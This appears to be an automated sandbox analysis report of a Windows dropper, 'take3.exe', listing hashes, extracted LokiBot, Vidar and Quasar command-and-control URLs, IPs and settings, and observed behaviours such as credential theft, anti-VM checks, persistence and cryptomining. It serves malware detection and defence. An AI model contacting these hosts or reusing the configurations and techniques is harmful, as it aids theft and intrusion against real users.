Analysis
-
max time kernel
140s -
max time network
119s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 01:53
Behavioral task
behavioral1
Sample
take3.exe
Resource
win11-20241007-en
General
-
Target
take3.exe
-
Size
14.3MB
-
MD5
84c0ea78eb89b7abee5e03ae8ee708e4
-
SHA1
91339bd35bd8f01868b8ff39d57b2f07fb050a0b
-
SHA256
9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
-
SHA512
ca66588967874065481bbe80c262c55b3c831e3c95a1fb8830581765cc3dbeaa9d5608823aee899de316be9323a986e6866d399f9950af22e37efb527476436f
-
SSDEEP
393216:KOWd863huc1dQJlAwF3MnG3InVFedWm7NS/xHWgnHz:b893hr1dQ53MG4VAHsT
Malware Config
Extracted
https://pastebin.com/raw/Adv9gBHa
Extracted
lokibot
http://frojbdawmiojfg.sytes.net:4410/fujfygidj/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Extracted
vidar
10.6
af458cf23e4b27326a35871876cc63d9
https://steamcommunity.com/profiles/76561199747278259
https://t.me/armad2a
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Extracted
quasar
1.4.1
SGVP
192.168.1.9:4782
150.129.206.176:4782
Ai-Sgvp-33452.portmap.host:33452
a35ec7b7-5a95-4207-8f25-7af0a7847fa5
-
encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
-
install_name
User Application Data.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windowns Client Startup
-
subdirectory
Quasar
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/4824-2312-0x00000000001A0000-0x00000000003E8000-memory.dmp family_vidar_v7 -
Lokibot family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\boot.exe,C:\\Program Files (x86)\\CSMClient\\CyberStation.exe," reg.exe -
Njrat family
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x001900000002ac6f-6453.dat family_quasar behavioral1/memory/5864-6463-0x0000000000EF0000-0x0000000001214000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 864 created 3264 864 Winsvc.exe 53 -
Vidar family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unik.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/1844-6510-0x00007FF668FA0000-0x00007FF669BF0000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 173 3124 powershell.exe -
pid Process 2940 powershell.exe 3124 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3848 netsh.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 4512 icacls.exe 2372 icacls.exe 5572 icacls.exe 640 takeown.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 228 chrome.exe 1844 chrome.exe 2960 msedge.exe 4396 msedge.exe 4900 msedge.exe 4120 chrome.exe 3996 chrome.exe 4708 chrome.exe 884 msedge.exe 984 msedge.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x001900000002ac78-191.dat net_reactor behavioral1/memory/4912-198-0x0000000000F50000-0x0000000000F9E000-memory.dmp net_reactor -
resource yara_rule behavioral1/files/0x001900000002ad54-6365.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unik.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unik.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs Winsvc.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\stacktrace.vbs taskmgr.exe -
Executes dropped EXE 53 IoCs
pid Process 1660 dsd.exe 2372 gvndxfghs.exe 3100 gvndxfghs.exe 4576 gvndxfghs.exe 4516 gvndxfghs.exe 4912 GOLD.exe 4524 svchost.exe 4540 nc64.exe 3544 bp.exe 3756 hack1226.exe 4892 TPB-1.exe 3056 c1.exe 3116 9758xBqgE1azKnB.exe 1704 PCclear_Eng_mini.exe 1208 winbox.exe 392 ew.exe 4936 unik.exe 864 Winsvc.exe 5736 svchost.exe 5388 ew.exe 5588 ipscan221.exe 5816 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 4824 build.exe 5824 shell.exe 6128 LedgerUpdater.exe 3704 ITplan.exe 5264 boot.exe 5752 wget.exe 5780 InstallSetup.exe 2332 me.exe 5888 NBYS%20ASM.NET.exe 2856 wow.exe 1844 xblkpfZ8Y4.exe 3616 wget.exe 5864 SGVP%20Client%20Users.exe 5496 FACTURA09876567000.bat 3168 wget.exe 2388 wget.exe 5924 run.exe 6076 run2.exe 5916 wget.exe 1092 wallx.exe 236 wget.exe 4708 WallpaperX.exe 564 wget.exe 5660 wget.exe 4712 wget.exe 5676 FixCSM.exe 4440 Coc Coc.exe 3516 portable_util.exe 4476 setup.exe 5568 setup.exe 6104 del.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Wine unik.exe -
Loads dropped DLL 28 IoCs
pid Process 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 3516 take3.exe 2856 wow.exe 2856 wow.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 2372 icacls.exe 5572 icacls.exe 640 takeown.exe 4512 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
resource yara_rule behavioral1/files/0x001900000002ac91-360.dat vmprotect behavioral1/files/0x001900000002ac91-2140.dat vmprotect behavioral1/memory/5736-2147-0x00007FF6AA170000-0x00007FF6AA3A7000-memory.dmp vmprotect behavioral1/memory/5736-2156-0x00007FF6AA170000-0x00007FF6AA3A7000-memory.dmp vmprotect -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: mstsc.exe File opened (read-only) \??\V: mstsc.exe File opened (read-only) \??\X: mstsc.exe File opened (read-only) \??\Y: mstsc.exe File opened (read-only) \??\E: mstsc.exe File opened (read-only) \??\H: mstsc.exe File opened (read-only) \??\O: mstsc.exe File opened (read-only) \??\W: mstsc.exe File opened (read-only) \??\Z: mstsc.exe File opened (read-only) \??\B: mstsc.exe File opened (read-only) \??\J: mstsc.exe File opened (read-only) \??\N: mstsc.exe File opened (read-only) \??\T: mstsc.exe File opened (read-only) \??\U: mstsc.exe File opened (read-only) \??\G: mstsc.exe File opened (read-only) \??\R: mstsc.exe File opened (read-only) \??\S: mstsc.exe File opened (read-only) \??\L: mstsc.exe File opened (read-only) \??\M: mstsc.exe File opened (read-only) \??\P: mstsc.exe File opened (read-only) \??\A: mstsc.exe File opened (read-only) \??\I: mstsc.exe File opened (read-only) \??\K: mstsc.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 1 raw.githubusercontent.com 82 raw.githubusercontent.com 83 raw.githubusercontent.com 84 raw.githubusercontent.com 105 raw.githubusercontent.com 137 pastebin.com 173 pastebin.com -
pid Process 5264 GameBarPresenceWriter.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/5496-6469-0x0000000000F50000-0x000000000107E000-memory.dmp autoit_exe behavioral1/memory/5496-6473-0x0000000000F50000-0x000000000107E000-memory.dmp autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\System32\del.exe wget.exe File opened for modification C:\Windows\System32\del.exe wget.exe File created C:\windows\system32\boot.exe cmd.exe File opened for modification C:\windows\system32\boot.exe cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\images\\BG.jpg" WallpaperX.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4936 unik.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2372 set thread context of 3100 2372 gvndxfghs.exe 88 PID 2372 set thread context of 4576 2372 gvndxfghs.exe 89 PID 2372 set thread context of 4516 2372 gvndxfghs.exe 90 PID 864 set thread context of 4184 864 Winsvc.exe 184 PID 4184 set thread context of 5640 4184 InstallUtil.exe 235 -
resource yara_rule behavioral1/files/0x00060000000259e6-815.dat upx behavioral1/memory/1208-820-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral1/memory/1208-933-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral1/files/0x001a00000002ad52-2175.dat upx behavioral1/memory/5588-2181-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral1/files/0x001a00000002ad58-2210.dat upx behavioral1/memory/4824-2214-0x00000000001A0000-0x00000000003E8000-memory.dmp upx behavioral1/memory/4824-2312-0x00000000001A0000-0x00000000003E8000-memory.dmp upx behavioral1/memory/5588-2445-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral1/files/0x001900000002ac75-6441.dat upx behavioral1/memory/1844-6445-0x00007FF668FA0000-0x00007FF669BF0000-memory.dmp upx behavioral1/memory/5496-6469-0x0000000000F50000-0x000000000107E000-memory.dmp upx behavioral1/memory/5496-6473-0x0000000000F50000-0x000000000107E000-memory.dmp upx behavioral1/memory/1844-6510-0x00007FF668FA0000-0x00007FF669BF0000-memory.dmp upx behavioral1/memory/5588-6621-0x0000000000400000-0x000000000044B000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\CocCoc\Browser\Application cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 3 IoCs
pid pid_target Process procid_target 4752 4912 WerFault.exe 91 6016 5816 WerFault.exe 164 5268 4936 WerFault.exe 157 -
System Location Discovery: System Language Discovery 1 TTPs 37 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hack1226.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wow.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FACTURA09876567000.bat Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9758xBqgE1azKnB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipscan221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PCclear_Eng_mini.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LedgerUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ITplan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language run.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winbox.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language portable_util.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GOLD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language del.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dsd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TPB-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language unik.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NBYS%20ASM.NET.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1748 PING.EXE 2880 PING.EXE 2960 cmd.exe 5224 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\TSRedirFlags mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Device Parameters mstsc.exe Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters mstsc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags mstsc.exe Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\Device Parameters mstsc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TPB-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TPB-1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 6008 timeout.exe 4808 timeout.exe 5432 timeout.exe 5944 timeout.exe 5124 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" PCclear_Eng_mini.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5} PCclear_Eng_mini.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772324414262944" chrome.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings take3.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4018527317-446799424-2810249686-1000\{27638E23-DFCC-449C-84C9-501570AB05D1} svchost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3544 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 1748 PING.EXE 2880 PING.EXE 5224 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3192 mstsc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2940 powershell.exe 2940 powershell.exe 3124 powershell.exe 3124 powershell.exe 4408 powershell.exe 4408 powershell.exe 4892 TPB-1.exe 4892 TPB-1.exe 4892 TPB-1.exe 4892 TPB-1.exe 4120 chrome.exe 4120 chrome.exe 4892 TPB-1.exe 4892 TPB-1.exe 4892 TPB-1.exe 4892 TPB-1.exe 4772 msedge.exe 4772 msedge.exe 884 msedge.exe 884 msedge.exe 4936 unik.exe 4936 unik.exe 4892 TPB-1.exe 4892 TPB-1.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 4824 build.exe 4824 build.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 4824 build.exe 4824 build.exe 4824 build.exe 4824 build.exe 3116 9758xBqgE1azKnB.exe 864 Winsvc.exe 864 Winsvc.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 5392 taskmgr.exe 5392 taskmgr.exe 4892 TPB-1.exe 4892 TPB-1.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 3116 9758xBqgE1azKnB.exe 5392 taskmgr.exe 5392 taskmgr.exe 3116 9758xBqgE1azKnB.exe 5392 taskmgr.exe 5392 taskmgr.exe 4184 InstallUtil.exe 4184 InstallUtil.exe 5392 taskmgr.exe 3116 9758xBqgE1azKnB.exe 5392 taskmgr.exe 5392 taskmgr.exe 3116 9758xBqgE1azKnB.exe 4184 InstallUtil.exe 4184 InstallUtil.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5588 ipscan221.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 3124 powershell.exe Token: SeDebugPrivilege 2372 gvndxfghs.exe Token: SeDebugPrivilege 4912 GOLD.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4524 svchost.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeShutdownPrivilege 4120 chrome.exe Token: SeCreatePagefilePrivilege 4120 chrome.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeDebugPrivilege 3116 9758xBqgE1azKnB.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeDebugPrivilege 864 Winsvc.exe Token: SeDebugPrivilege 3100 gvndxfghs.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeDebugPrivilege 864 Winsvc.exe Token: SeDebugPrivilege 5392 taskmgr.exe Token: SeSystemProfilePrivilege 5392 taskmgr.exe Token: SeCreateGlobalPrivilege 5392 taskmgr.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeDebugPrivilege 4184 InstallUtil.exe Token: 33 4524 svchost.exe Token: SeIncBasePriorityPrivilege 4524 svchost.exe Token: SeLockMemoryPrivilege 1844 xblkpfZ8Y4.exe Token: SeLockMemoryPrivilege 1844 xblkpfZ8Y4.exe Token: SeDebugPrivilege 5864 SGVP%20Client%20Users.exe Token: SeLockMemoryPrivilege 5640 AddInProcess.exe Token: SeLockMemoryPrivilege 5640 AddInProcess.exe Token: SeDebugPrivilege 4708 WallpaperX.exe Token: SeTakeOwnershipPrivilege 640 takeown.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 4120 chrome.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 3192 mstsc.exe 3192 mstsc.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5780 InstallSetup.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5496 FACTURA09876567000.bat 5496 FACTURA09876567000.bat 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 